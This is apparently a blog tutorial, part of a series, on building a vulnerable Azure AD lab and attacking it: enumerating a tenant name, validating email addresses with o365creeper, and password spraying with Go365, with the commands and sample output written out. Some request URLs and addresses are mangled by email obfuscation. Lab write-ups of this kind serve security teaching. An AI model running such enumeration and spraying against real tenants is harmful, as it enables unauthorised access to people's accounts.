This article is part of a blog series where I explain common Azure vulnerabilities, how to create a lab such that it reproduces the issues, and how to exploit it. To follow this tutorial, you’ll need an Azure account and Azure CLI tool installed on your machine both of which you can get for free.
- You can can create an account for free at https://azure.microsoft.com/
- You can install Azure CLI from https://docs.microsoft.com/en-us/cli/azure/install-azure-cli
- You can find the source code of the challenges at https://github.com/andrei8055/Azure-security-challenges
- Consider getting Azure certified? Check my article on how to get Certified Azure Red Team Proffessional
- Part #1: Create an Azure Vulnerable Lab: Part #1 – Anonymous Blob Access
- Part #2: Create an Azure Vulnerable Lab: Part #2 – Environment Variables
- Part #3: Create an Azure Vulnerable Lab: Part #3 – Soft Deleted Blobs
- Part #4: Create an Azure Vulnerable Lab: Part #4 – Managed Identities
- Part #5: Create an Azure Vulnerable Lab: Part #5 – Cloud Init
1. Azure Active Directory
Azure Active Directory (Azure AD) [..] is an enterprise identity service that provides single sign-on, multifactor authentication, and conditional access [..] – Microsoft
In this lab we will see how to create an AAD tenant, how to enumerate the tenant name, discover email addresses registered in the tenant and perform password spraying attacks against them.
2. Setting up an AAD Tenant
First, login to the Azure Portal and search for Azure Active Directory
In the newly opened window, select Manage Tenants
And then Create
If that is the only Tenant available on your account, it should be selected by default otherwise you can use the “Make default tenant” option in the “Manage Tenants” page.
Once you have selected the default tenant, create several new users:
For the password spraying attack, we will use the “Let me create the password” option and set it to “0xPwn0xPwn!!!123” – we will use this to demonstrate how a successful attack looks.
3. Enumerate Tenant
To start the enumeration process, we start from the company name and check possible options. For example 0xpwn could be 0xpwn, 0xpwncorp, 0xpwnorg, etc. and replace it in the
The following request/response is for an organization that is registered on the Azure AD:
https://firstname.lastname@example.org&xml=1 <RealmInfo Success="true"> <State>4</State> <UserState>1</UserState> <Login>email@example.com</Login> <NameSpaceType>Managed</NameSpaceType> <DomainName>0xpwnorg.onmicrosoft.com</DomainName> <IsFederatedNS>false</IsFederatedNS> <FederationBrandName>0xPwN Organization</FederationBrandName> <CloudInstanceName>microsoftonline.com</CloudInstanceName> <CloudInstanceIssuerUri>urn:federation:MicrosoftOnline</CloudInstanceIssuerUri> </RealmInfo>
The following output shows that the tenant does not exist:
https://firstname.lastname@example.org&xml=1 <RealmInfo Success="true"> <State>4</State> <UserState>1</UserState> <Login>email@example.com</Login> <NameSpaceType>Unknown</NameSpaceType> </RealmInfo>
4. Enumerate Accounts
Once we found out the tenant name, we can enumerate emails using o365creeper in combination with a list of emails:
bash> cat emails.txt firstname.lastname@example.org email@example.com firstname.lastname@example.org email@example.com bash> python o365creeper.py -f emails.txt firstname.lastname@example.org - VALID email@example.com - INVALID firstname.lastname@example.org - VALID email@example.com - INVALID
5. Password Spraying
After we identified several valid emails, we can proceed with password spraying. For this we can use Go365
bash> cat usernames bob alice jhon michael bash> ./Go365 -ul usernames -p '0xPwn0xPwn!!!123' -d 0xpwnorg.onmicrosoft.com -endpoint graph [i] Using the graph endpoint... [graph] [+] Possible valid login! firstname.lastname@example.org : 0xPwn0xPwn!!!123 [graph] [-] Valid user, but invalid password: email@example.com : 0xPwn0xPwn!!!123 [graph] [-] User not found: firstname.lastname@example.org [graph] [-] Valid user, but invalid password: email@example.com : 0xPwn0xPwn!!!123 [graph] [-] User not found: @0xpwnorg.onmicrosoft.com
And that’s it! In this lab we have seen how to set up an AAD tenant with users, and starting from the company name discover the tenant, enumerate emails and password spray the accounts.
5 thoughts on “Create an Azure Vulnerable Lab: Part #6 – AAD Enumeration and Password Spraying”